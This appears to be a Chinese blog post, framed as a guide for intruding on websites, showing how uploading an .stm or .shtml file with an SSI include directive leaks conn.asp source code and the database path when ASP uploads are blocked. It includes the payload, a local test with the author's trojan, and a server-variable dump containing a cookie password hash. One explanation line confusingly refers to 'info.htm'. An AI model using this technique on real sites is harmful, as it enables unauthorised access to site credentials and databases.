当网站不允许上传asp木马时的一个解决方法

入侵的过程当中,大多离不开上传,当目标网站不允许上传ASP木马的时候我们该怎么办呢?

本文介绍了一个解决方法,希望能给你带来帮助。

将以下文件保存为stm或者shtml。

HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 当前文件名称:F:/Web/1.stm

Web服务器的名称和版本:Microsoft-IIS/5.0 主机名:localhost 端口:80 客户或客户代理IP地址:127.0.0.1 客户或客户代理主机名:127.0.0.1 PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:/Web/1.stm 客户端给出附加路径信息:/1.stm image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*

当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!

如上所说的<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。 我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为: <!--#include file="ok.asp"--> 又在同一目录下放了一个我的一个木马文件ok.asp 在浏览器中请求test.stm,没有什么反映,一片空白。 但是一查看源代码,狂晕,原来就是我的asp文件的内容! 这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径, 但是一个前提是服务器的对stm或者shtml的扩展没有删除!

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值